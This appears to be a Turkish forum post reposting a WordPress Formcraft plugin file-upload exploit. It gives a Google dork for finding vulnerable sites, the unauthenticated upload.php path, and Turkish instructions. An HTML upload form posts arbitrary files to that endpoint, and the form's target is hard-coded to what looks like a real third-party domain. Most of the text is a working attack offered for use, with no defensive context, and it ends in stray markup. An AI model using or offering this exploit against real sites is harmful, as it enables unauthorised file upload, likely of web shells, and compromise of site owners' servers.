Kod:
# Exploit Title: Formcraft Plugin Upexploit
# Google Dork: intext:"powered by formcraft", inurl:plugins/formcraft
# Date: 27.06.2015
# Exploit Author: sec4ever / Tw3ntyOne
# Vendor Homepage: http://www.wordpress.com
# Version: all
# Tested on: Windows/Debian
Exploit:[SITE]/wp-content/plugins/formcraft/file-upload/server/content/upload.php
{"failed":"No file found 2"} - Bu hatayı aldıktan sonra html de ki site kısmına ekleyip htmlyi çalıştırıyoruz ve uploadı gerçekleştiriyoruz.
Html Code :
<title>Cyber-Warrior TIM</title>
<text>CW Wordpress Exploit</text>
<form method="POST" action="
http://serrasbanheiras.com.br/wp-content/plugins/formcraft/file-upload/server/content/upload.php
" enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Dosyayi Yukle</button>
</form>
gt;
[/code]